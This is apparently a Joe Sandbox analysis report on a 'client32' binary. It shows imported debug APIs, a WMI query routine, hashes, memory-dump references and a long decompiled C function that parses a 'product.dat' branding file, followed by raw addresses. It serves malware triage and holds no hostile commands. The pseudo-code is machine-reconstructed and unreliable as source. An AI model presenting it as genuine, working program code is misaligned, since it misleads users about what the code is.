SymGetModuleInfo, xrefs: 11144282
SymFunctionTableAccess, xrefs: 11144298
SymGetLineFromName, xrefs: 11144217
DBGHELP.DLL, xrefs: 111441CF, 111441D4
dbghelp.dll, xrefs: 11144198
SymGetSymFromAddr, xrefs: 1114428D
SymSetOptions, xrefs: 11144277
SymGetOptions, xrefs: 1114426C
SymInitialize, xrefs: 11144261
IMAGEHLP.DLL, xrefs: 111441DE, 111441E3, 111441E9
SymGetLineNext, xrefs: 1114421F
SymLoadModule, xrefs: 11144256
SymMatchFileName, xrefs: 11144235
SymGetLineFromAddr, xrefs: 111441F8
StackWalk, xrefs: 11144243
SymGetLinePrev, xrefs: 1114422A
SymCleanup, xrefs: 1114424B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
API String ID: 3874234733-2061581830
Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59

Uniqueness

Uniqueness Score: -1.00%

Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183
commemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,0CBC1010,00000000,?), ref: 1115C927
CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
wsprintfW.USER32 ref: 1115C967
SysAllocString.OLEAUT32(?), ref: 1115C973
wsprintfW.USER32 ref: 1115CA27
SysFreeString.OLEAUT32(?), ref: 1115CAC8

Strings

SELECT * FROM %s, xrefs: 1115CA21
WQL, xrefs: 1115CA40
root\CIMV2, xrefs: 1115C961

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
String ID: SELECT * FROM %s$WQL$root\CIMV2
API String ID: 3050498177-823534439
Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4

Strings

NSMWClass, xrefs: 110317AF
NSMWClass, xrefs: 110317C3
Client32, xrefs: 11031784

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID: Client32$NSMWClass$NSMWClass
API String ID: 3192549508-611217420
Opcode ID: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
Opcode Fuzzy Hash: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99

Uniqueness

Uniqueness Score: -1.00%

Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E11028C10(intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v268;
				char _v272;
				struct HINSTANCE__* _v276;
				struct HINSTANCE__* _v280;
				char _v284;
				struct HINSTANCE__* _v288;
				struct HINSTANCE__* _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr* _t85;
				void* _t88;
				void* _t90;
				intOrPtr _t95;
				void* _t99;
				short* _t103;
				char _t105;
				intOrPtr* _t106;
				intOrPtr _t109;
				signed int _t112;
				signed int _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				char _t155;
				CHAR* _t156;
				intOrPtr* _t159;
				intOrPtr _t160;
				short _t161;
				void* _t162;
				void* _t163;
				char* _t168;
				intOrPtr _t170;
				short* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				char* _t184;
				char* _t185;
				char* _t186;
				char* _t187;
				char* _t188;
				char* _t189;
				char* _t190;
				char* _t191;
				char* _t192;
				char* _t193;
				char* _t194;
				char* _t195;
				char* _t196;
				char* _t197;
				char* _t198;
				char* _t199;
				char* _t200;
				char* _t201;
				char _t202;
				CHAR _t203;
				intOrPtr _t204;
				char _t205;
				intOrPtr _t206;
				char _t208;
				char* _t209;
				char* _t210;
				void* _t212;
				void* _t213;
				intOrPtr _t214;
				signed int _t215;
				short* _t217;
				void* _t220;
				intOrPtr* _t222;
				signed int _t223;
				void* _t224;
				void* _t225;

				_t77 =  *0x111ec774; // 0xcbc1010
				_v8 = _t77 ^ _t223;
				if( *0x111ee2f0 != 0) {
					L118:
					_t79 = _a4;
					_pop(_t220);
					if(_t79 == 0x11) {
						_t168 =  *0x111e4ff0; // 0x111ee310
						if( *_t168 == 0) {
							_t79 = 6;
						}
					}
					_t80 = _t79 - 1;
					if(_t79 - 1 <= 0x12) {
						__eflags = _v8 ^ _t223;
						return E11162BB7( *((intOrPtr*)(0x111e4fb0 + _t80 * 4)), _t162, _v8 ^ _t223, _t207, _t215, _t220);
					} else {
						return E11162BB7(0x1119a4c4, _t162, _v8 ^ _t223, _t207, _t215, _t220);
					}
				}
				_t85 = _a8;
				_push(_t162);
				_push(_t215);
				_v284 = 1;
				_v272 = 0;
				_v276 = 0;
				_v292 = 0;
				_v280 = 0;
				_v288 = 0;
				if(_t85 == 0) {
					GetModuleFileNameA(0,  &_v268, 0x104);
					_t88 = E111640B0( &_v268,  &_v268, 0x5c);
					_t208 = "product.dat"; // 0x646f7270
					 *((intOrPtr*)(_t88 + 1)) = _t208;
					_t170 = M1119A5B4; // 0x2e746375
					 *((intOrPtr*)(_t88 + 5)) = _t170;
					_t207 =  *0x1119a5b8; // 0x746164
					 *((intOrPtr*)(_t88 + 9)) = _t207;
					_t90 = E11164EAD( &_v268, "r"); // executed
					_t225 = _t224 + 0x10;
					goto L14;
				} else {
					_t212 =  &_v268 - _t85;
					goto L3;
					do {
						L5:
						_t203 =  *_t156;
						_t156 = _t156 + 1;
					} while (_t203 != 0);
					if( *((char*)(_t223 + _t156 - _t213 - 0x109)) == 0x5c) {
						L10:
						_t159 =  &_v268 - 1;
						do {
							_t204 =  *((intOrPtr*)(_t159 + 1));
							_t159 = _t159 + 1;
						} while (_t204 != 0);
						_t205 = "product.dat"; // 0x646f7270
						_t214 = M1119A5B4; // 0x2e746375
						 *_t159 = _t205;
						_t206 =  *0x1119a5b8; // 0x746164
						 *((intOrPtr*)(_t159 + 4)) = _t214;
						_t207 =  &_v268;
						 *((intOrPtr*)(_t159 + 8)) = _t206;
						_t90 = E11164EAD( &_v268, "r");
						_t225 = _t224 + 8;
						L14:
						_t163 = _t90;
						 *0x111ee2e4 = 0;
						if(_t163 == 0) {
							L117:
							_pop(_t215);
							 *0x111ee2f0 = 1;
							_pop(_t162);
							goto L118;
						}
						_t238 = _t163 - 0xffffffff;
						if(_t163 == 0xffffffff) {
							goto L117;
						}
						_t221 =  &_v268;
						if(E11026EF0(_t90, _t163, _t215, _t221, _t238) == 0) {
							L115:
							_push(_t163);
							E11164C77(_t163, _t215, _t221, _t256);
							if(_v272 != _v284) {
								 *0x111e4fb0 = 0x1119a4c8;
								 *0x111e4fb4 = 0x1119a4c8;
								 *0x111e4fb8 = 0x1119a4c8;
								 *0x111e4fbc = 0x1119a4c8;
								 *0x111e4fc0 = 0x1119a4c8;
								 *0x111e4fc4 = 0x1119a4c8;
								 *0x111e4fc8 = 0x1119a4c8;
								 *0x111e4fcc = 0x1119a4c8;
								 *0x111e4fd0 = 0x1119a4c8;
								 *0x111e4fd4 = 0x1119a4c8;
								 *0x111e4fd8 = 0x1119a4c8;
								 *0x111e4fdc = 0x1119a4c8;
								 *0x111e4fe0 = 0x1119a4c8;
								 *0x111e4fe4 = 0x1119a4c8;
								 *0x111e4fe8 = 0x1119a4c8;
								 *0x111e4fec = 0x1119a4c8;
								 *0x111e4ff0 = 0x1119a4c8;
								 *0x111e4ff4 = 0x1119a4c8;
							}
							goto L117;
						}
						_push(_t221);
						_t95 = E11163CA7();
						_t225 = _t225 + 4;
						 *0x111ee2e4 = _t95;
						if(_t95 == 4) {
							L19:
							_t207 =  &_v272;
							E11026D60( &_v268,  &_v272, 0);
							_t225 = _t225 + 0xc;
							_t221 =  &_v268;
							_t99 = E11026EF0(_t163, _t163, _t215,  &_v268, _t241);
							_t242 = _t99;
							if(_t99 == 0) {
								goto L115;
							}
							_v284 = E11026FE0( &_v268);
							_t225 = _t225 + 4;
							_t215 = 0;
							if(E11026EF0(_t163, _t163, 0, _t221, _t242) == 0) {
								L102:
								if( *0x111ee2e4 != 4 || _t215 >= 0x12) {
									L106:
									if(_v276 != 0) {
										L109:
										if(_v292 == 0) {
											_t174 =  *0x111e4fe8; // 0x111e4cdc
											 *_t174 = 0x31;
										}
										if(_v280 == 0) {
											_t103 =  *0x111e4fec; // 0x111e4f98
											_t207 = 0x31;
											 *_t103 = 0x31;
										}
										_t256 = _v288;
										if(_v288 == 0) {
											_t207 =  *0x111e4ff4; // 0x111e4fa4
											 *_t207 = 0x31;
										}
										goto L115;
									}
									_t175 =  *0x111e4fc4; // 0x111e4cb8
									_t209 =  *0x111e4fdc; // 0x111e4ea8
									do {
										_t105 =  *_t175;
										 *_t209 = _t105;
										_t175 = _t175 + 1;
										_t209 = _t209 + 1;
									} while (_t105 != 0);
									goto L109;
								} else {
									_t106 = 0x111e4fb0 + _t215 * 4;
									do {
										_t207 =  *_t106;
										_t106 = _t106 + 4;
										 *_t207 = 0x493f3f;
									} while (_t106 < 0x111e4ff8);
									goto L106;
								}
							}
							do {
								_t207 =  &_v272;
								E11026D60( &_v268,  &_v272, 0);
								_t109 =  *0x111ee2e4; // 0x0
								_t225 = _t225 + 0xc;
								if(_t109 != 4) {
									__eflags = _t109 - 5;
									if(__eflags != 0) {
										goto L101;
									}
									_t112 = E11165010( &_v268, 0x3d);
									_t225 = _t225 + 8;
									__eflags = _t112;
									if(__eflags == 0) {
										goto L101;
									}
									_t207 =  &_v268;
									_t41 = _t112 + 1; // 0x1
									_t222 = _t41;
									 *_t112 = 0;
									_t113 = E1116558E(_t222,  &_v268, "Name");
									_t225 = _t225 + 8;
									__eflags = _t113;
									if(_t113 != 0) {
										_t115 = E1116558E(_t222,  &_v268, "LongName");
										_t225 = _t225 + 8;
										__eflags = _t115;
										if(_t115 != 0) {
											_t116 = E1116558E(_t222,  &_v268, "ShortName");
											_t225 = _t225 + 8;
											__eflags = _t116;
											if(_t116 != 0) {
												_t207 =  &_v268;
												_t117 = E1116558E(_t222,  &_v268, "Home");
												_t225 = _t225 + 8;
												__eflags = _t117;
												if(_t117 != 0) {
													_t119 = E1116558E(_t222,  &_v268, "TLA");
													_t225 = _t225 + 8;
													__eflags = _t119;
													if(_t119 != 0) {
														_t120 = E1116558E(_t222,  &_v268, "NSSName");
														_t225 = _t225 + 8;
														__eflags = _t120;
														if(_t120 != 0) {
															_t207 =  &_v268;
															_t121 = E1116558E(_t222,  &_v268, "NSSTLA");
															_t225 = _t225 + 8;
															__eflags = _t121;
															if(_t121 != 0) {
																_t123 = E1116558E(_t222,  &_v268, "SupportWWW");
																_t225 = _t225 + 8;
																__eflags = _t123;
																if(_t123 != 0) {
																	_t124 = E1116558E(_t222,  &_v268, "SupportEMail");
																	_t225 = _t225 + 8;
																	__eflags = _t124;
																	if(_t124 != 0) {
																		_t207 =  &_v268;
																		_t125 = E1116558E(_t222,  &_v268, "NSMAppDataDir");
																		_t225 = _t225 + 8;
																		__eflags = _t125;
																		if(_t125 != 0) {
																			_t127 = E1116558E(_t222,  &_v268, "NSSAppDataDir");
																			_t225 = _t225 + 8;
																			__eflags = _t127;
																			if(_t127 != 0) {
																				_t128 = E1116558E(_t222,  &_v268, "NSSConfName");
																				_t225 = _t225 + 8;
																				__eflags = _t128;
																				if(_t128 != 0) {
																					_t207 =  &_v268;
																					_t129 = E1116558E(_t222,  &_v268, "AssistantName");
																					_t225 = _t225 + 8;
																					__eflags = _t129;
																					if(_t129 != 0) {
																						_t131 = E1116558E(_t222,  &_v268, "AssistantURL");
																						_t225 = _t225 + 8;
																						__eflags = _t131;
																						if(_t131 != 0) {
																							_t132 = E1116558E(_t222,  &_v268, "SupportsChrome");
																							_t225 = _t225 + 8;
																							__eflags = _t132;
																							if(_t132 != 0) {
																								_t207 =  &_v268;
																								_t133 = E1116558E(_t222,  &_v268, "TechConsole");
																								_t225 = _t225 + 8;
																								__eflags = _t133;
																								if(_t133 != 0) {
																									_t135 = E1116558E(_t222,  &_v268, "NSSLongCaption");
																									_t225 = _t225 + 8;
																									__eflags = _t135;
																									if(_t135 != 0) {
																										_t136 = E1116558E(_t222,  &_v268, "SupportsAndroid");
																										_t225 = _t225 + 8;
																										__eflags = _t136;
																										if(__eflags != 0) {
																											goto L101;
																										}
																										_t184 =  *0x111e4ff4; // 0x111e4fa4
																										_v288 = 1;
																										do {
																											_t137 =  *_t222;
																											 *_t184 = _t137;
																											_t222 = _t222 + 1;
																											_t184 = _t184 + 1;
																											__eflags = _t137;
																										} while (__eflags != 0);
																										goto L101;
																									}
																									_t185 =  *0x111e4ff0; // 0x111ee310
																									do {
																										_t138 =  *_t222;
																										 *_t185 = _t138;
																										_t222 = _t222 + 1;
																										_t185 = _t185 + 1;
																										__eflags = _t138;
																									} while (__eflags != 0);
																									goto L101;
																								}
																								_t186 =  *0x111e4fec; // 0x111e4f98
																								_v280 = 1;
																								do {
																									_t139 =  *_t222;
																									 *_t186 = _t139;
																									_t222 = _t222 + 1;
																									_t186 = _t186 + 1;
																									__eflags = _t139;
																								} while (__eflags != 0);
																								goto L101;
																							}
																							_t187 =  *0x111e4fe8; // 0x111e4cdc
																							_v292 = 1;
																							do {
																								_t140 =  *_t222;
																								 *_t187 = _t140;
																								_t222 = _t222 + 1;
																								_t187 = _t187 + 1;
																								__eflags = _t140;
																							} while (__eflags != 0);
																							goto L101;
																						}
																						_t188 =  *0x111e4fe4; // 0x111e4f18
																						do {
																							_t141 =  *_t222;
																							 *_t188 = _t141;
																							_t222 = _t222 + 1;
																							_t188 = _t188 + 1;
																							__eflags = _t141;
																						} while (__eflags != 0);
																						goto L101;
																					}
																					_t189 =  *0x111e4fe0; // 0x111e4ec8
																					do {
																						_t142 =  *_t222;
																						 *_t189 = _t142;
																						_t222 = _t222 + 1;
																						_t189 = _t189 + 1;
																						__eflags = _t142;
																					} while (__eflags != 0);
																					goto L101;
																				}
																				_t190 =  *0x111e4fdc; // 0x111e4ea8
																				_v276 = 1;
																				do {
																					_t143 =  *_t222;
																					 *_t190 = _t143;
																					_t222 = _t222 + 1;
																					_t190 = _t190 + 1;
																					__eflags = _t143;
																				} while (__eflags != 0);
																				goto L101;
																			}
																			_t191 =  *0x111e4fd8; // 0x111e4e48
																			do {
																				_t144 =  *_t222;
																				 *_t191 = _t144;
																				_t222 = _t222 + 1;
																				_t191 = _t191 + 1;
																				__eflags = _t144;
																			} while (__eflags != 0);
																			goto L101;
																		}
																		_t192 =  *0x111e4fd4; // 0x111e4de8
																		do {
																			_t145 =  *_t222;
																			 *_t192 = _t145;
																			_t222 = _t222 + 1;
																			_t192 = _t192 + 1;
																			__eflags = _t145;
																		} while (__eflags != 0);
																		goto L101;
																	}
																	_t193 =  *0x111e4fd0; // 0x111e4d68
																	do {
																		_t146 =  *_t222;
																		 *_t193 = _t146;
																		_t222 = _t222 + 1;
																		_t193 = _t193 + 1;
																		__eflags = _t146;
																	} while (__eflags != 0);
																	goto L101;
																}
																_t194 =  *0x111e4fcc; // 0x111e4ce8
																do {
																	_t147 =  *_t222;
																	 *_t194 = _t147;
																	_t222 = _t222 + 1;
																	_t194 = _t194 + 1;
																	__eflags = _t147;
																} while (__eflags != 0);
																goto L101;
															}
															_t195 =  *0x111e4fc8; // 0x111e4cd8
															do {
																_t148 =  *_t222;
																 *_t195 = _t148;
																_t222 = _t222 + 1;
																_t195 = _t195 + 1;
																__eflags = _t148;
															} while (__eflags != 0);
															goto L101;
														}
														_t196 =  *0x111e4fc4; // 0x111e4cb8
														do {
															_t149 =  *_t222;
															 *_t196 = _t149;
															_t222 = _t222 + 1;
															_t196 = _t196 + 1;
															__eflags = _t149;
														} while (__eflags != 0);
														goto L101;
													}
													_t197 =  *0x111e4fc0; // 0x111e4cb4
													do {
														_t150 =  *_t222;
														 *_t197 = _t150;
														_t222 = _t222 + 1;
														_t197 = _t197 + 1;
														__eflags = _t150;
													} while (__eflags != 0);
													goto L101;
												}
												_t198 =  *0x111e4fbc; // 0x111e4ca8
												do {
													_t151 =  *_t222;
													 *_t198 = _t151;
													_t222 = _t222 + 1;
													_t198 = _t198 + 1;
													__eflags = _t151;
												} while (__eflags != 0);
												goto L101;
											}
											_t199 =  *0x111e4fb8; // 0x111e4c1c
											do {
												_t152 =  *_t222;
												 *_t199 = _t152;
												_t222 = _t222 + 1;
												_t199 = _t199 + 1;
												__eflags = _t152;
											} while (__eflags != 0);
											goto L101;
										}
										_t200 =  *0x111e4fb4; // 0x111e4c68
										do {
											_t153 =  *_t222;
											 *_t200 = _t153;
											_t222 = _t222 + 1;
											_t200 = _t200 + 1;
											__eflags = _t153;
										} while (__eflags != 0);
										goto L101;
									}
									_t201 =  *0x111e4fb0; // 0x111e4c28
									do {
										_t154 =  *_t222;
										 *_t201 = _t154;
										_t222 = _t222 + 1;
										_t201 = _t201 + 1;
										__eflags = _t154;
									} while (__eflags != 0);
									goto L101;
								}
								if(_t215 >= 0x12) {
									L26:
									_t247 = _t215 - 0xb;
									if(_t215 == 0xb) {
										_v276 = 1;
									}
									goto L101;
								}
								_t210 =  *((intOrPtr*)(0x111e4fb0 + _t215 * 4));
								_t176 =  &_v268;
								do {
									_t155 =  *_t176;
									 *_t210 = _t155;
									_t176 = _t176 + 1;
									_t210 = _t210 + 1;
								} while (_t155 != 0);
								goto L26;
								L101:
								_t221 =  &_v268;
								_t215 = _t215 + 1;
							} while (E11026EF0(_t163, _t163, _t215,  &_v268, _t247) != 0);
							goto L102;
						}
						_t241 = _t95 - 5;
						if(_t95 != 5) {
							goto L115;
						}
						goto L19;
					} else {
						_t217 =  &_v268 - 1;
						goto L8;
						L8:
						_t160 =  *((intOrPtr*)(_t217 + 1));
						_t217 = _t217 + 1;
						if(_t160 != 0) {
							goto L8;
						} else {
							_t161 = "\\"; // 0x5c
							 *_t217 = _t161;
							goto L10;
						}
					}
					L3:
					_t202 =  *_t85;
					 *((char*)(_t85 + _t212)) = _t202;
					_t85 = _t85 + 1;
					if(_t202 != 0) {
						goto L3;
					} else {
						_t156 =  &_v268;
						_t213 = _t156 + 1;
						goto L5;
					}
				}
			}

0x11028c19
0x11028c20
0x11028c2d
0x110292f8
0x110292f8
0x110292fb
0x110292ff
0x11029301
0x1102930a
0x1102930c
0x1102930c
0x1102930a
0x11029311
0x11029315
0x11029334
0x1102933e
0x11029317
0x11029329
0x11029329
0x11029315
0x11028c33
0x11028c36
0x11028c37
0x11028c38
0x11028c42
0x11028c48
0x11028c4e
0x11028c54
0x11028c5a
0x11028c62
0x11028cfd
0x11028d0c
0x11028d11
0x11028d17
0x11028d1a
0x11028d20
0x11028d23
0x11028d29
0x11028d38
0x11028d3d
0x00000000
0x11028c68
0x11028c6e
0x11028c6e
0x11028c83
0x11028c83
0x11028c83
0x11028c85
0x11028c86
0x11028c94
0x11028cb1
0x11028cb7
0x11028cb8
0x11028cb8
0x11028cbb
0x11028cbc
0x11028cc0
0x11028cc6
0x11028ccc
0x11028cce
0x11028cd4
0x11028cd7
0x11028ce3
0x11028ce6
0x11028ceb
0x11028d40
0x11028d40
0x11028d42
0x11028d4a
0x110292ef
0x110292ef
0x110292f0
0x110292f7
0x00000000
0x110292f7
0x11028d50
0x11028d53
0x00000000
0x00000000
0x11028d59
0x11028d67
0x11029275
0x11029275
0x11029276
0x1102928a
0x11029295
0x1102929a
0x1102929f
0x110292a4
0x110292a9
0x110292ae
0x110292b3
0x110292b8
0x110292bd
0x110292c2
0x110292c7
0x110292cc
0x110292d1
0x110292d6
0x110292db
0x110292e0
0x110292e5
0x110292ea
0x110292ea
0x00000000
0x1102928a
0x11028d6f
0x11028d70
0x11028d75
0x11028d78
0x11028d80
0x11028d8b
0x11028d8d
0x11028d9b
0x11028da0
0x11028da3
0x11028dab
0x11028db0
0x11028db3
0x00000000
0x00000000
0x11028dc1
0x11028dc7
0x11028dcc
0x11028dd6
0x110291e5
0x110291ec
0x11029212
0x11029219
0x11029231
0x11029238
0x1102923a
0x11029245
0x11029245
0x1102924f
0x11029251
0x11029256
0x1102925b
0x1102925b
0x1102925e
0x11029265
0x11029267
0x11029272
0x11029272
0x00000000
0x11029265
0x1102921b
0x11029221
0x11029227
0x11029227
0x11029229
0x1102922b
0x1102922c
0x1102922d
0x00000000
0x110291f3
0x110291f3
0x11029200
0x11029200
0x11029202
0x11029205
0x1102920b
0x00000000
0x11029200
0x110291ec
0x11028de0
0x11028de2
0x11028df0
0x11028df5
0x11028dfa
0x11028e00
0x11028e36
0x11028e39
0x00000000
0x00000000
0x11028e48
0x11028e4d
0x11028e50
0x11028e52
0x00000000
0x00000000
0x11028e58
0x11028e64
0x11028e64
0x11028e67
0x11028e6a
0x11028e6f
0x11028e72
0x11028e74
0x11028e9b
0x11028ea0
0x11028ea3
0x11028ea5
0x11028ecb
0x11028ed0
0x11028ed3
0x11028ed5
0x11028eef
0x11028efb
0x11028f00
0x11028f03
0x11028f05
0x11028f2b
0x11028f30
0x11028f33
0x11028f35
0x11028f5b
0x11028f60
0x11028f63
0x11028f65
0x11028f7f
0x11028f8b
0x11028f90
0x11028f93
0x11028f95
0x11028fbb
0x11028fc0
0x11028fc3
0x11028fc5
0x11028feb
0x11028ff0
0x11028ff3
0x11028ff5
0x1102900f
0x1102901b
0x11029020
0x11029023
0x11029025
0x1102904b
0x11029050
0x11029053
0x11029055
0x1102907b
0x11029080
0x11029083
0x11029085
0x110290a6
0x110290b2
0x110290b7
0x110290ba
0x110290bc
0x110290df
0x110290e4
0x110290e7
0x110290e9
0x1102910c
0x11029111
0x11029114
0x11029116
0x11029137
0x11029143
0x11029148
0x1102914b
0x1102914d
0x1102917b
0x11029180
0x11029183
0x11029185
0x110291a8
0x110291ad
0x110291b0
0x110291b2
0x00000000
0x00000000
0x110291b4
0x110291ba
0x110291c4
0x110291c4
0x110291c6
0x110291c8
0x110291c9
0x110291ca
0x110291ca
0x00000000
0x110291c4
0x11029187
0x11029190
0x11029190
0x11029192
0x11029194
0x11029195
0x11029196
0x11029196
0x00000000
0x1102919a
0x1102914f
0x11029155
0x11029160
0x11029160
0x11029162
0x11029164
0x11029165
0x11029166
0x11029166
0x00000000
0x1102916a
0x11029118
0x1102911e
0x11029128
0x11029128
0x1102912a
0x1102912c
0x1102912d
0x1102912e
0x1102912e
0x00000000
0x11029132
0x110290eb
0x110290f1
0x110290f1
0x110290f3
0x110290f5
0x110290f6
0x110290f7
0x110290f7
0x00000000
0x110290fb
0x110290be
0x110290c4
0x110290c4
0x110290c6
0x110290c8
0x110290c9
0x110290ca
0x110290ca
0x00000000
0x110290ce
0x11029087
0x1102908d
0x11029097
0x11029097
0x11029099
0x1102909b
0x1102909c
0x1102909d
0x1102909d
0x00000000
0x110290a1
0x11029057
0x11029060
0x11029060
0x11029062
0x11029064
0x11029065
0x11029066
0x11029066
0x00000000
0x1102906a
0x11029027
0x11029030
0x11029030
0x11029032
0x11029034
0x11029035
0x11029036
0x11029036
0x00000000
0x1102903a
0x11028ff7
0x11029000
0x11029000
0x11029002
0x11029004
0x11029005
0x11029006
0x11029006
0x00000000
0x1102900a
0x11028fc7
0x11028fd0
0x11028fd0
0x11028fd2
0x11028fd4
0x11028fd5
0x11028fd6
0x11028fd6
0x00000000
0x11028fda
0x11028f97
0x11028fa0
0x11028fa0
